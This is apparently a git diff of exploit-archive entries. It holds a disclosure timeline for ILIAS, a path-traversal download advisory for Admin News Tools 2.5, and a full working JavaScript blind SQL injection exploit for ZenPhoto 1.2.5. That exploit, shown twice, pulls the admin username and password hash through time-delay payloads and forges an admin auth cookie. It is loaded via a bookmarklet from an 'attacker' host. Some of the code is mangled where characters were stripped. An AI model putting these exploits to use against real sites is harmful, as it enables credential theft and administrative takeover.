+**2009-06-30**  ~~~~~> VENDOR CLARIFIED SECURITY ISSUES: "Confirm that all your exploits work in the latest published official release"
+
+**2009-07-01**  ~~~~~> VENDOR CONFIRMED NEXT RELEASE WILL CONTAIN THE FIXES
+
+**2009-07-01**  ~~~~~> I WILL WAIT NEXT RELEASE FOR FULL DISCLOSURE
+
+**2009-07-08**  ~~~~~> ILIAS LAUNCHED NEW STABLE RELEASE (3.10.8 / 3.9.10)
+
+**2009-07-11**  ~~~~~> I CONTACTED AGAIN TO SAY A DISCLOSURE DATE, STABLISHED FOR 2009-07-15 (WAIT ONE WEEK AFTER NEW RELEASE...)
+
+**2009-07-12**  ~~~~~> ILIAS AGREE WITH THIS DATE AND POSTED A LINK FOR CREDITS
+
+**2009-07-15**  ~~~~~> FULL DISCLOSURE...PUBLISHED ADVISORY.
+
+
+
+
+<<<-----------------------------EOF---------------------------------->>>ENJOY IT!
+
+
+
+
+##############################################################################
+##############################################################################
+##**************************************************************************##
+##         SPECIAL THANKS TO: MILW0RM FOREVER!!...STR0KE THE BEST!          ##
+##**************************************************************************##
+##--------------------------------------------------------------------------##
+##**************************************************************************##
+## GREETZ TO: JosS, Ulises2k, J.McCray, Evil1 and Spanish Hack3Rs community!##
+##**************************************************************************##
+##############################################################################
+##############################################################################
+
+# milw0rm.com [2009-07-15]
diff --git a/platforms/php/webapps/9153.txt b/platforms/php/webapps/9153.txt
index c7bbc6b58..6b33683be 100755
--- a/platforms/php/webapps/9153.txt
+++ b/platforms/php/webapps/9153.txt
@@ -1,27 +1,27 @@
-######################### Securitylab.ir ########################
-# Application Info:
-# Name: Admin News Tools
-# Version: 2.5
-# Website: http://www.adminnewstools.fr.nf
-# Download: http://www.adminnewstools.fr.nf/zip/ANT-2.5.zip
-#################################################################
-# Discoverd By: Securitylab.ir
-# Website: http://securitylab.ir
-# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
-#################################################################
-# Vulnerability Info:
-# Type: Remote File Download Vulnerability
-# Risk: Medium
-#===========================================================
-# Download.php
-# header('Content-Disposition: attachment; filename=' . basename ($_GET['fichier']));
-# readfile($_GET['fichier']);
-# }
-#
-# http://www.site.com/news/system/download.php?fichier=./../up.php
-#===========================================================
-#################################################################
-# Securitylab Security Research Team
-###################################################################
-
-# milw0rm.com [2009-07-15]
+######################### Securitylab.ir ########################
+# Application Info:
+# Name: Admin News Tools
+# Version: 2.5
+# Website: http://www.adminnewstools.fr.nf
+# Download: http://www.adminnewstools.fr.nf/zip/ANT-2.5.zip
+#################################################################
+# Discoverd By: Securitylab.ir
+# Website: http://securitylab.ir
+# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
+#################################################################
+# Vulnerability Info:
+# Type: Remote File Download Vulnerability
+# Risk: Medium
+#===========================================================
+# Download.php
+# header('Content-Disposition: attachment; filename=' . basename ($_GET['fichier']));
+# readfile($_GET['fichier']);
+# }
+#
+# http://www.site.com/news/system/download.php?fichier=./../up.php
+#===========================================================
+#################################################################
+# Securitylab Security Research Team
+###################################################################
+
+# milw0rm.com [2009-07-15]
diff --git a/platforms/php/webapps/9154.js b/platforms/php/webapps/9154.js
index 48b6a1bb0..236482b1f 100755
--- a/platforms/php/webapps/9154.js
+++ b/platforms/php/webapps/9154.js
@@ -1,588 +1,588 @@
-/*
- * ZenPhoto 1.2.5 Completly Blind SQL Injection Exploit
- * Requirements: magic_quotes = ANY (zenpage disables it anyway), ZenPage needs to be activated and have at least one news category
- * 
- * What does this exploit let you do:
- * The precoded functions I provided will allow you to extract the username and password hash of the admin from the database.
- * It will also let you login to the admin panel w/o actually knowing the plain text password (only the username and hash are required)
- * 
- * How To Use:
- * 1) upload this script to http://attacker/exploit.js
- * 2) open a vulnerable category in your webbrowser (Example: http://victim/zenphoto/news/category/anycategorynamehere)
- * 3) Enter the following code into your address bar:
- * javascript:(function(){var url = "http://attacker/exploit.js"; var evil = document.createElement('script'); evil.src = url; document.body.appendChild(evil);})();
- * 4) Press enter and wait for the exploit console to show
- * 5) You may now extract the username/password hash from the database (buggy  :(  )
- * 6) Use the username/password hash with the Login Emulation tool to login to the admin panel
- * 7) Have fun  :) 
- * 
- * WARNING: THIS IS BUGGY! You might not get the hash/username correct the first time. Play with the settings below to tweak it so it works better for you
- * 
- * Why this works:
- * The sanitize function doesn't escape single quotes...
- * 
- * Vulnerable Code (index.php):
- * 95: $catname = sanitize($_GET['category']);
- * 96: query("UPDATE ".prefix('zenpage_news_categories')." SET `hitcounter` = `hitcounter`+1 WHERE `cat_link` = '".$catname."'",true);
- *
- * Patch:
- * 95: $catname = mysql_real_escape_string($_GET['category']);
- * 
- * Example Exploitation:
- * /zenphoto/news/category/cat1' and hitcounter = (SELECT IF(SUBSTRING(password,1 ,1) = 'A',BENCHMARK(5000000,ENCODE('this will probably','waste some time')),null) FROM zp_administrators) and '1' = '1
- *
- * This payload will delay the page from loading for about 5 seconds if the first letter of the password hash is 'A'
- * 
- * The time detection isn't perfect and was pretty much slapped together. Make sure you try editing the variables below or
- * make your own injector :P
- * 
- * Discovered and Coded by petros@dusecurity.com
- * Shoutz to xplorer and the rest of the DuSec Team
- */
-
-
-// Change this if you are having problems with the injection
-var patience = .8; // Time in seconds on how patient we are. Will be substracted from the benchmark time
-var max_retries = 3; // maximum retries after failed HTTP request
-var charset_hash = "0123456789abcdef".split(''); // charset for the password hash
-var charset_username = "abcdefghiklmnopqrstuvqxzy0123456789ABCEDFGHIJKLMNOPQRSTUVWXYZ ._".split(''); // charset for the username
-var username_max = 64; // max length of the username
-var hash_max = 32; // max length of password hash (its md5..i wouldnt change this)
-var benchmark_code = "BENCHMARK(5850000,ENCODE('this will probably','waste some time'))"; // code used to slow down requests if the query is true
-var show_timing = false; // whether or not to show the timings of each request (good for debugging)
-var delay = 1500; // delay in miliseconds between request
-var err_delay = 1000; //delay in miliseconds to wait after an error
-
-
-// Dont edit below this line
-var display = false;
-var display_loot = false;
-var loot = false;
-var loot_username = false;
-var loot_password = false;
-
-function get(page) // returns how long it took to send/receive the request...
-{
-	var xhr = window.ActiveXObject ? new ActiveXObject("Microsoft.XMLHTTP") : new XMLHttpRequest();
-	
-	xhr.open('GET', page, false); // keep it syncronized..
-		xhr.setRequestHeader( "If-Modified-Since", "Sat, 1 Jan 2000 00:00:00 GMT" ); // cache..
-	var seconds = getTime();
-	xhr.send(null);
-	seconds = getTime() - seconds;
-	var success = (xhr.readyState == 4 && xhr.status == 200);
-	xhr = null; // dispose
-	return { 'miliseconds': seconds, 'seconds': seconds / 1000, 'success': success };
-	
-}
-function getTime()
-{
-	return Math.round(new Date().getTime());
-}
-function createDisplay() // create the display div
-{
-	var div = document.createElement("DIV");
-	div.style.backgroundColor = '#C3FFB9';
-	div.style.border = '2px dashed green';
-	div.style.margin = '3px';
-	div.style.paddingLeft = '10px';
-	div.style.paddingBottom = '10px';
-	
-	div.innerHTML = '
    ZenPhoto Blind Injection -- petros@dusecurity

    ';
-	display = document.createElement("P");
-	
-	document.body.insertBefore(div, document.body.childNodes[0]);
-	div.appendChild(display);
-}
-
-function write(text)
-{
-	display.innerHTML += text + "
    ";
-}
-
-function setDisplay(text)
-{
-	display.innerHTML = text;
-}
-
-function clearDisplay()
-{
-	display.innerHTML = '';
-}
-function getPath()
-{
-	return window.location.pathname;
-}
-
-function showMenu()
-{
-	clearDisplay();
-	write('What you like to do?');
-	var ul = document.createElement('OL'); // changed to OL so they know to do it in steps
-	createListItem('Extract Admin Username', 'extractusername();',ul);
-	createListItem('Extract Admin Password','extractpassword();',ul);
-	createListItem('Login to Admin using Hash', 'adminlogin();', ul);
-	display.appendChild(ul);
-}
-var un;
-var pw;
-function adminlogin()
-{
-	clearDisplay();
-	write("Admin Login Emulator: ");
-	un = createTextbox('Username: ', (loot_username) ? loot_username : '[Enter Username]');
-	pw = createTextbox('Password: ', (loot_password) ? loot_password: '[Enter Hash]');
-	createButton('Pwn!', "step2();");
-	write('
    Back To Menu');
-
-}
-function step2()
-{
-		var username = un.value;
-		var password = pw.value;
-		var auth =MD5(username + password);
-		SetCookie('zenphoto_auth', MD5(username + password), 30);
-		clearDisplay();
-		write("Generated auth cookie: zenphoto_auth=" + auth);
-		write("You are now logged in with admin privileges :)");
-		write('Enter Admin Panel');
-		write('
    Back To Menu');
-
-}
-function createTextbox(label, value)
-{
-	display.innerHTML += "" + label + "";
-	var tb = document.createElement('input');
-	tb.type = 'text';
-	tb.value = value;
-	display.appendChild(tb);
-	write('');
-	return tb;
-	
-}
-function createButton(text, click)
-{
-	write("");
-	
-}
-function addEvent(elem, type, handle)
-{
-	if (elem.addEventListener)
-			elem.addEventListener(type, handle, false);
-	else if (elem.attachEvent)
-			elem.attachEvent("on" + type, handle);
-}
-// borrowed function
-function SetCookie(cookieName,cookieValue,nDays) {
- var today = new Date();
- var expire = new Date();
- if (nDays==null || nDays==0) nDays=1;
- expire.setTime(today.getTime() + 3600000*24*nDays);
- document.cookie = cookieName+"="+escape(cookieValue)
-                 + ";expires="+expire.toGMTString() + ";path=../../";
-}
-
-function extractusername()
-{
-	clearDisplay();
-	var path = getPath();
-	var basetime = 0;
-	var benchmark = 0;
-	var diff = 0;
-	var offset = 0;
-	var charset_len = charset_username.length;
-	var resp = false;
-	loot = '';
-	display_loot = false;
-	write("Extracting username..");
-	write("Using path: " + path);
-	
-	resp = get(path);
-	if(!resp.success) { write("Failed to request page."); return; }
-	basetime = resp.miliseconds;
-	write("Normal request time set to " + basetime + " milisecond(s)");
-	resp = get(path + "' and hitcounter = (SELECT IF('1' = '1',"+benchmark_code+",null)) and '1' = '1");
-	benchmark = resp.miliseconds;
-	diff = benchmark - basetime;
-	if(diff <= (patience * 1000)){ alert("Error calculating request difference! Try again later."); showMenu();}
-	write("Benchmark request time set to " + benchmark + " milisecond(s)");
-	if(benchmark <= (basetime + (patience * 1000))){ write("Error: Benchmark took less time than expected. Script might be patched or magic_quotes may be enabled. Make sure you are NOT logged in a try again."); return;}
-	write("Username: 
    ");
-	display_loot = document.getElementById('loot');
-	var retries = 0;
-	var min = diff - (patience * 1000);
-	var best_match = 0;
-	var best = '';
-	if(min < 0) { write("Error: Benchmark took less time than expected. Please try again later."); return;}
-	function readNextChar()
-	{
-		var c = charset_username[offset];
-		display_loot.innerHTML = '';
-		display_loot.innerHTML += loot + c;
-		
-		resp = get(path + "' and hitcounter = (SELECT IF(SUBSTRING(user,"+ (loot.length + 1)+" ,1) = '"+ c +"',"+ benchmark_code+",null) FROM zp_administrators LIMIT 0,1) and '1' = '1");
-		if(!resp.success) { ++retries; if(retries >= max_retries) { write("failed to execute exploit (too many errors)"); return;} setTimeout(readNextChar, err_delay); return;}
-		retries = 0; //reset error counter
-		var took = resp.miliseconds - basetime; //difference
-	
-		if(took > 0 && best_match < took) {best_match = took; best = c;}
-		if(show_timing)
-			write(loot.length + 1 + "> "+ 'char= ' + c + ', took= ' + took + ', min= ' + min);
-		if(took >=  min)
-		{
-			loot += c;
-			if(show_timing)
-			write("got \"" + loot + "\" so far...");
-			display_loot.innerHTML = '';
-			display_loot.innerHTML += loot;
-			best = '';
-			best_match = 0;
-			offset = 0;
-		}
-		else
-			offset++;
-			
-		if(loot.length >= username_max)
-		{
-			display_loot.innerHTML = ''; display_loot += loot;
-			loot_username = loot;
-			write('Back To Menu');
-			alert("Admin Username is \"" + loot + "\"\r\n(reached max length)");
-			return;
-		}
-		if(offset < charset_len)
-			setTimeout(readNextChar, delay);
-		else
-		{
-			if(loot.length < username_max)
-			{
-				write("best match: " + best_match); 
-				function beAnAsshole(){
-				loot +=  best;
-				best = ''; best_match = 0;
-				display_loot.innerHTML = '';
-				display_loot.innerHTML += loot;
-				offset = 0;
-				setTimeout(readNextChar, delay);
-				return;}
-			}
-			display_loot.innerHTML = '';
-			display_loot.innerHTML += loot;
-			loot_username = loot;
-			write('Back To Menu');
-			
-			alert("Admin Username is \"" + loot + "\"");
-		}
-	}
-		readNextChar();
-	}
-
-function extractpassword()
-{
-	clearDisplay();
-	var path = getPath();
-	var basetime = 0;
-	var benchmark = 0;
-	var diff = 0;
-	var offset = 0;
-	var charset_len = charset_hash.length;
-	var resp = false;
-	loot = '';
-	display_loot = false;
-	write("Extracting password..");
-	write("Using path: " + path);
-	
-	resp = get(path);
-	if(!resp.success) { write("Failed to request page."); return; }
-	basetime = resp.miliseconds;
-	write("Normal request time set to " + basetime + " milisecond(s)");
-	resp = get(path + "' and hitcounter = (SELECT IF('1' = '1',"+benchmark_code+",null)) and '1' = '1");
-	benchmark = resp.miliseconds;
-	write("Benchmark request time set to " + benchmark + " milisecond(s)");
-	if(benchmark <= (basetime + (patience * 1000))){ write("Error: Benchmark took less time than expected. Script might be patched or magic_quotes may be enabled. Make sure you are NOT logged in a try again."); return;}
-	write("Password: 
    ");
-	display_loot = document.getElementById('loot');
-	var retries = 0;
-	diff = benchmark - basetime;
-	if(diff <= 0) { alert("Failed to determine difference. Try again later"); showMenu(); return;}
-	var min = diff- (patience * 1000);
-	var best_match = 0;
-	var best = '';
-	if(min < 0) { write("Error: Benchmark took less time than expected. Please try again later."); return;}
-	function readNextChar()
-	{
-		var c = charset_hash[offset];
-		display_loot.innerHTML = '';
-		display_loot.innerHTML += loot + c;
-		
-		resp = get(path + "' and hitcounter = (SELECT IF(SUBSTRING(password,"+ (loot.length + 1)+" ,1) = '"+ c +"',"+ benchmark_code+",null) FROM zp_administrators LIMIT 0,1) and '1' = '1");
-		if(!resp.success) { ++retries; if(retries >= max_retries) { write("failed to execute exploit (too many errors)"); return;} setTimeout(readNextChar, err_delay); return;}
-		var took = resp.miliseconds - basetime;
-		retries = 0;
-		if(took > 0 && took > best_match) {best_match = took; best = c;}
-		if(show_timing)
-			write(loot.length + "> "+ 'char= ' + c + ', took= ' + took + ', min= ' + min);
-		if(took >=  min)
-		{
-			loot += c;
-			display_loot.innerHTML = '';
-			display_loot.innerHTML += loot;
-			offset = 0;
-			best = ''; best_match = 0;
-		}
-		else
-			offset++;
-		if(loot.length >= hash_max)
-		{
-			display_loot.innerHTML = ''; display_loot += loot;
-			loot_password = loot;
-			write('Back To Menu');
-			alert("Admin Password Hash is \"" + loot + "\"\r\n(reached max length)");
-			return;
-		}
-		if(offset < charset_len)
-			setTimeout(readNextChar, delay);
-		else
-		{
-			if(loot.length < hash_max)
-			{
-				loot +=  best;
-				best = ''; best_match = 0;
-				display_loot.innerHTML = '';
-				display_loot.innerHTML += loot;
-				offset = 0;
-				setTimeout(readNextChar, delay);
-				return;
-			}
-			display_loot.innerHTML = '';
-			display_loot.innerHTML += loot;
-			loot_password = loot;
-			write('Back To Menu');
-			alert("Admin Password Hash is \"" + loot + "\"");
-		}
-	}
-		readNextChar();
-	}
-
-
-function createListItem(label, onclick, list)
-{
-	var li = document.createElement("LI");
-	li.innerHTML = '' + label + "";
-	list.appendChild(li);
-
-}
-
-createDisplay();
-showMenu();
-
-
-/**
-*
-*  MD5 (Message-Digest Algorithm)
-*  http://www.webtoolkit.info/
-*
-**/
- 
-var MD5 = function (string) {
- 
-	function RotateLeft(lValue, iShiftBits) {
-		return (lValue<>>(32-iShiftBits));
-	}
- 
-	function AddUnsigned(lX,lY) {
-		var lX4,lY4,lX8,lY8,lResult;
-		lX8 = (lX & 0x80000000);
-		lY8 = (lY & 0x80000000);
-		lX4 = (lX & 0x40000000);
-		lY4 = (lY & 0x40000000);
-		lResult = (lX & 0x3FFFFFFF)+(lY & 0x3FFFFFFF);
-		if (lX4 & lY4) {
-			return (lResult ^ 0x80000000 ^ lX8 ^ lY8);
-		}
-		if (lX4 | lY4) {
-			if (lResult & 0x40000000) {
-				return (lResult ^ 0xC0000000 ^ lX8 ^ lY8);
-			} else {
-				return (lResult ^ 0x40000000 ^ lX8 ^ lY8);
-			}
-		} else {
-			return (lResult ^ lX8 ^ lY8);
-		}
- 	}
- 
- 	function F(x,y,z) { return (x & y) | ((~x) & z); }
- 	function G(x,y,z) { return (x & z) | (y & (~z)); }
- 	function H(x,y,z) { return (x ^ y ^ z); }
-	function I(x,y,z) { return (y ^ (x | (~z))); }
- 
-	function FF(a,b,c,d,x,s,ac) {
-		a = AddUnsigned(a, AddUnsigned(AddUnsigned(F(b, c, d), x), ac));
-		return AddUnsigned(RotateLeft(a, s), b);
-	};
- 
-	function GG(a,b,c,d,x,s,ac) {
-		a = AddUnsigned(a, AddUnsigned(AddUnsigned(G(b, c, d), x), ac));
-		return AddUnsigned(RotateLeft(a, s), b);
-	};
- 
-	function HH(a,b,c,d,x,s,ac) {
-		a = AddUnsigned(a, AddUnsigned(AddUnsigned(H(b, c, d), x), ac));
-		return AddUnsigned(RotateLeft(a, s), b);
-	};
- 
-	function II(a,b,c,d,x,s,ac) {
-		a = AddUnsigned(a, AddUnsigned(AddUnsigned(I(b, c, d), x), ac));
-		return AddUnsigned(RotateLeft(a, s), b);
-	};
- 
-	function ConvertToWordArray(string) {
-		var lWordCount;
-		var lMessageLength = string.length;
-		var lNumberOfWords_temp1=lMessageLength + 8;
-		var lNumberOfWords_temp2=(lNumberOfWords_temp1-(lNumberOfWords_temp1 % 64))/64;
-		var lNumberOfWords = (lNumberOfWords_temp2+1)*16;
-		var lWordArray=Array(lNumberOfWords-1);
-		var lBytePosition = 0;
-		var lByteCount = 0;
-		while ( lByteCount < lMessageLength ) {
-			lWordCount = (lByteCount-(lByteCount % 4))/4;
-			lBytePosition = (lByteCount % 4)*8;
-			lWordArray[lWordCount] = (lWordArray[lWordCount] | (string.charCodeAt(lByteCount)<>>29;
-		return lWordArray;
-	};
- 
-	function WordToHex(lValue) {
-		var WordToHexValue="",WordToHexValue_temp="",lByte,lCount;
-		for (lCount = 0;lCount<=3;lCount++) {
-			lByte = (lValue>>>(lCount*8)) & 255;
-			WordToHexValue_temp = "0" + lByte.toString(16);
-			WordToHexValue = WordToHexValue + WordToHexValue_temp.substr(WordToHexValue_temp.length-2,2);
-		}
-		return WordToHexValue;
-	};
- 
-	function Utf8Encode(string) {
-		string = string.replace(/\r\n/g,"\n");
-		var utftext = "";
- 
-		for (var n = 0; n < string.length; n++) {
- 
-			var c = string.charCodeAt(n);
- 
-			if (c < 128) {
-				utftext += String.fromCharCode(c);
-			}
-			else if((c > 127) && (c < 2048)) {
-				utftext += String.fromCharCode((c >> 6) | 192);
-				utftext += String.fromCharCode((c & 63) | 128);
-			}
-			else {
-				utftext += String.fromCharCode((c >> 12) | 224);
-				utftext += String.fromCharCode(((c >> 6) & 63) | 128);
-				utftext += String.fromCharCode((c & 63) | 128);
-			}
- 
-		}
- 
-		return utftext;
-	};
- 
-	var x=Array();
-	var k,AA,BB,CC,DD,a,b,c,d;
-	var S11=7, S12=12, S13=17, S14=22;
-	var S21=5, S22=9 , S23=14, S24=20;
-	var S31=4, S32=11, S33=16, S34=23;
-	var S41=6, S42=10, S43=15, S44=21;
- 
-	string = Utf8Encode(string);
- 
-	x = ConvertToWordArray(string);
- 
-	a = 0x67452301; b = 0xEFCDAB89; c = 0x98BADCFE; d = 0x10325476;
- 
-	for (k=0;k";
+}
+
+function setDisplay(text)
+{
+	display.innerHTML = text;
+}
+
+function clearDisplay()
+{
+	display.innerHTML = '';
+}
+function getPath()
+{
+	return window.location.pathname;
+}
+
+function showMenu()
+{
+	clearDisplay();
+	write('What you like to do?');
+	var ul = document.createElement('OL'); // changed to OL so they know to do it in steps
+	createListItem('Extract Admin Username', 'extractusername();',ul);
+	createListItem('Extract Admin Password','extractpassword();',ul);
+	createListItem('Login to Admin using Hash', 'adminlogin();', ul);
+	display.appendChild(ul);
+}
+var un;
+var pw;
+function adminlogin()
+{
+	clearDisplay();
+	write("Admin Login Emulator: ");
+	un = createTextbox('Username: ', (loot_username) ? loot_username : '[Enter Username]');
+	pw = createTextbox('Password: ', (loot_password) ? loot_password: '[Enter Hash]');
+	createButton('Pwn!', "step2();");
+	write('
    Back To Menu');
+
+}
+function step2()
+{
+		var username = un.value;
+		var password = pw.value;
+		var auth =MD5(username + password);
+		SetCookie('zenphoto_auth', MD5(username + password), 30);
+		clearDisplay();
+		write("Generated auth cookie: zenphoto_auth=" + auth);
+		write("You are now logged in with admin privileges :)");
+		write('Enter Admin Panel');
+		write('
    Back To Menu');
+
+}
+function createTextbox(label, value)
+{
+	display.innerHTML += "" + label + "";
+	var tb = document.createElement('input');
+	tb.type = 'text';
+	tb.value = value;
+	display.appendChild(tb);
+	write('');
+	return tb;
+	
+}
+function createButton(text, click)
+{
+	write("");
+	
+}
+function addEvent(elem, type, handle)
+{
+	if (elem.addEventListener)
+			elem.addEventListener(type, handle, false);
+	else if (elem.attachEvent)
+			elem.attachEvent("on" + type, handle);
+}
+// borrowed function
+function SetCookie(cookieName,cookieValue,nDays) {
+ var today = new Date();
+ var expire = new Date();
+ if (nDays==null || nDays==0) nDays=1;
+ expire.setTime(today.getTime() + 3600000*24*nDays);
+ document.cookie = cookieName+"="+escape(cookieValue)
+                 + ";expires="+expire.toGMTString() + ";path=../../";
+}
+
+function extractusername()
+{
+	clearDisplay();
+	var path = getPath();
+	var basetime = 0;
+	var benchmark = 0;
+	var diff = 0;
+	var offset = 0;
+	var charset_len = charset_username.length;
+	var resp = false;
+	loot = '';
+	display_loot = false;
+	write("Extracting username..");
+	write("Using path: " + path);
+	
+	resp = get(path);
+	if(!resp.success) { write("Failed to request page."); return; }
+	basetime = resp.miliseconds;
+	write("Normal request time set to " + basetime + " milisecond(s)");
+	resp = get(path + "' and hitcounter = (SELECT IF('1' = '1',"+benchmark_code+",null)) and '1' = '1");
+	benchmark = resp.miliseconds;
+	diff = benchmark - basetime;
+	if(diff <= (patience * 1000)){ alert("Error calculating request difference! Try again later."); showMenu();}
+	write("Benchmark request time set to " + benchmark + " milisecond(s)");
+	if(benchmark <= (basetime + (patience * 1000))){ write("Error: Benchmark took less time than expected. Script might be patched or magic_quotes may be enabled. Make sure you are NOT logged in a try again."); return;}
+	write("Username: 
    ");
+	display_loot = document.getElementById('loot');
+	var retries = 0;
+	var min = diff - (patience * 1000);
+	var best_match = 0;
+	var best = '';
+	if(min < 0) { write("Error: Benchmark took less time than expected. Please try again later."); return;}
+	function readNextChar()
+	{
+		var c = charset_username[offset];
+		display_loot.innerHTML = '';
+		display_loot.innerHTML += loot + c;
+		
+		resp = get(path + "' and hitcounter = (SELECT IF(SUBSTRING(user,"+ (loot.length + 1)+" ,1) = '"+ c +"',"+ benchmark_code+",null) FROM zp_administrators LIMIT 0,1) and '1' = '1");
+		if(!resp.success) { ++retries; if(retries >= max_retries) { write("failed to execute exploit (too many errors)"); return;} setTimeout(readNextChar, err_delay); return;}
+		retries = 0; //reset error counter
+		var took = resp.miliseconds - basetime; //difference
+	
+		if(took > 0 && best_match < took) {best_match = took; best = c;}
+		if(show_timing)
+			write(loot.length + 1 + "> "+ 'char= ' + c + ', took= ' + took + ', min= ' + min);
+		if(took >=  min)
+		{
+			loot += c;
+			if(show_timing)
+			write("got \"" + loot + "\" so far...");
+			display_loot.innerHTML = '';
+			display_loot.innerHTML += loot;
+			best = '';
+			best_match = 0;
+			offset = 0;
+		}
+		else
+			offset++;
+			
+		if(loot.length >= username_max)
+		{
+			display_loot.innerHTML = ''; display_loot += loot;
+			loot_username = loot;
+			write('Back To Menu');
+			alert("Admin Username is \"" + loot + "\"\r\n(reached max length)");
+			return;
+		}
+		if(offset < charset_len)
+			setTimeout(readNextChar, delay);
+		else
+		{
+			if(loot.length < username_max)
+			{
+				write("best match: " + best_match); 
+				function beAnAsshole(){
+				loot +=  best;
+				best = ''; best_match = 0;
+				display_loot.innerHTML = '';
+				display_loot.innerHTML += loot;
+				offset = 0;
+				setTimeout(readNextChar, delay);
+				return;}
+			}
+			display_loot.innerHTML = '';
+			display_loot.innerHTML += loot;
+			loot_username = loot;
+			write('Back To Menu');
+			
+			alert("Admin Username is \"" + loot + "\"");
+		}
+	}
+		readNextChar();
+	}
+
+function extractpassword()
+{
+	clearDisplay();
+	var path = getPath();
+	var basetime = 0;
+	var benchmark = 0;
+	var diff = 0;
+	var offset = 0;
+	var charset_len = charset_hash.length;
+	var resp = false;
+	loot = '';
+	display_loot = false;
+	write("Extracting password..");
+	write("Using path: " + path);
+	
+	resp = get(path);
+	if(!resp.success) { write("Failed to request page."); return; }
+	basetime = resp.miliseconds;
+	write("Normal request time set to " + basetime + " milisecond(s)");
+	resp = get(path + "' and hitcounter = (SELECT IF('1' = '1',"+benchmark_code+",null)) and '1' = '1");
+	benchmark = resp.miliseconds;
+	write("Benchmark request time set to " + benchmark + " milisecond(s)");
+	if(benchmark <= (basetime + (patience * 1000))){ write("Error: Benchmark took less time than expected. Script might be patched or magic_quotes may be enabled. Make sure you are NOT logged in a try again."); return;}
+	write("Password: 
    ");
+	display_loot = document.getElementById('loot');
+	var retries = 0;
+	diff = benchmark - basetime;
+	if(diff <= 0) { alert("Failed to determine difference. Try again later"); showMenu(); return;}
+	var min = diff- (patience * 1000);
+	var best_match = 0;
+	var best = '';
+	if(min < 0) { write("Error: Benchmark took less time than expected. Please try again later."); return;}
+	function readNextChar()
+	{
+		var c = charset_hash[offset];
+		display_loot.innerHTML = '';
+		display_loot.innerHTML += loot + c;
+		
+		resp = get(path + "' and hitcounter = (SELECT IF(SUBSTRING(password,"+ (loot.length + 1)+" ,1) = '"+ c +"',"+ benchmark_code+",null) FROM zp_administrators LIMIT 0,1) and '1' = '1");
+		if(!resp.success) { ++retries; if(retries >= max_retries) { write("failed to execute exploit (too many errors)"); return;} setTimeout(readNextChar, err_delay); return;}
+		var took = resp.miliseconds - basetime;
+		retries = 0;
+		if(took > 0 && took > best_match) {best_match = took; best = c;}
+		if(show_timing)
+			write(loot.length + "> "+ 'char= ' + c + ', took= ' + took + ', min= ' + min);
+		if(took >=  min)
+		{
+			loot += c;
+			display_loot.innerHTML = '';
+			display_loot.innerHTML += loot;
+			offset = 0;
+			best = ''; best_match = 0;
+		}
+		else
+			offset++;
+		if(loot.length >= hash_max)
+		{
+			display_loot.innerHTML = ''; display_loot += loot;
+			loot_password = loot;
+			write('Back To Menu');
+			alert("Admin Password Hash is \"" + loot + "\"\r\n(reached max length)");
+			return;
+		}
+		if(offset < charset_len)
+			setTimeout(readNextChar, delay);
+		else
+		{
+			if(loot.length < hash_max)
+			{
+				loot +=  best;
+				best = ''; best_match = 0;
+				display_loot.innerHTML = '';
+				display_loot.innerHTML += loot;
+				offset = 0;
+				setTimeout(readNextChar, delay);
+				return;
+			}
+			display_loot.innerHTML = '';
+			display_loot.innerHTML += loot;
+			loot_password = loot;
+			write('Back To Menu');
+			alert("Admin Password Hash is \"" + loot + "\"");
+		}
+	}
+		readNextChar();
+	}
+
+
+function createListItem(label, onclick, list)
+{
+	var li = document.createElement("LI");
+	li.innerHTML = '' + label + "";
+	list.appendChild(li);
+
+}
+
+createDisplay();
+showMenu();
+
+
+/**
+*
+*  MD5 (Message-Digest Algorithm)
+*  http://www.webtoolkit.info/
+*
+**/
+ 
+var MD5 = function (string) {
+ 
+	function RotateLeft(lValue, iShiftBits) {
+		return (lValue<>>(32-iShiftBits));
+	}
+ 
+	function AddUnsigned(lX,lY) {
+		var lX4,lY4,lX8,lY8,lResult;
+		lX8 = (lX & 0x80000000);
+		lY8 = (lY & 0x80000000);
+		lX4 = (lX & 0x40000000);
+		lY4 = (lY & 0x40000000);
+		lResult = (lX & 0x3FFFFFFF)+(lY & 0x3FFFFFFF);
+		if (lX4 & lY4) {
+			return (lResult ^ 0x80000000 ^ lX8 ^ lY8);
+		}
+		if (lX4 | lY4) {
+			if (lResult & 0x40000000) {
+				return (lResult ^ 0xC0000000 ^ lX8 ^ lY8);
+			} else {
+				return (lResult ^ 0x40000000 ^ lX8 ^ lY8);
+			}
+		} else {
+			return (lResult ^ lX8 ^ lY8);
+		}
+ 	}
+ 
+ 	function F(x,y,z) { return (x & y) | ((~x) & z); }
+ 	function G(x,y,z) { return (x & z) | (y & (~z)); }
+ 	function H(x,y,z) { return (x ^ y ^ z); }
+	function I(x,y,z) { return (y ^ (x | (~z))); }
+ 
+	function FF(a,b,c,d,x,s,ac) {
+		a = AddUnsigned(a, AddUnsigned(AddUnsigned(F(b, c, d), x), ac));
+		return AddUnsigned(RotateLeft(a, s), b);
+	};
+ 
+	function GG(a,b,c,d,x,s,ac) {
+		a = AddUnsigned(a, AddUnsigned(AddUnsigned(G(b, c, d), x), ac));
+		return AddUnsigned(RotateLeft(a, s), b);
+	};
+ 
+	function HH(a,b,c,d,x,s,ac) {
+		a = AddUnsigned(a, AddUnsigned(AddUnsigned(H(b, c, d), x), ac));
+		return AddUnsigned(RotateLeft(a, s), b);
+	};
+ 
+	function II(a,b,c,d,x,s,ac) {
+		a = AddUnsigned(a, AddUnsigned(AddUnsigned(I(b, c, d), x), ac));
+		return AddUnsigned(RotateLeft(a, s), b);
+	};
+ 
+	function ConvertToWordArray(string) {
+		var lWordCount;
+		var lMessageLength = string.length;
+		var lNumberOfWords_temp1=lMessageLength + 8;
+		var lNumberOfWords_temp2=(lNumberOfWords_temp1-(lNumberOfWords_temp1 % 64))/64;
+		var lNumberOfWords = (lNumberOfWords_temp2+1)*16;
+		var lWordArray=Array(lNumberOfWords-1);
+		var lBytePosition = 0;
+		var lByteCount = 0;
+		while ( lByteCount < lMessageLength ) {
+			lWordCount = (lByteCount-(lByteCount % 4))/4;
+			lBytePosition = (lByteCount % 4)*8;
+			lWordArray[lWordCount] = (lWordArray[lWordCount] | (string.charCodeAt(lByteCount)<>>29;
+		return lWordArray;
+	};
+ 
+	function WordToHex(lValue) {
+		var WordToHexValue="",WordToHexValue_temp="",lByte,lCount;
+		for (lCount = 0;lCount<=3;lCount++) {
+			lByte = (lValue>>>(lCount*8)) & 255;
